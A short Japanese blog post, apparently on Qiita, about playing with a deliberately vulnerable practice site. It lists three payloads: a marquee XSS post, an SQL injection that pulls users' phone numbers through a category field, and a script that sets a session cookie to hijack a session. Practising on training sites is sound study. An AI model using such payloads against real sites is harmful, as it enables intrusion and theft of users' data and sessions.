LoginSignup
0
0

More than 1 year has passed since last update.

ハッキングの遊びができるもの見つけた!

Posted at

脆弱サイト

入力コマンド

1 XSS(投稿)

<marquee>ひさじゅのほーむぺーじ</marquee>
  1. SQLインジェクションカテゴリのvalueを以下に変更
SELECT m.user_id, m.message, u.tel as created_at, m.category FROM messages as m join users as u on u.id = m.user_id order by m.id desc

セッションハイジャック

<script>document.cookie='session_key=a3cde67fd955af54b319678d6e;';</script>
0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0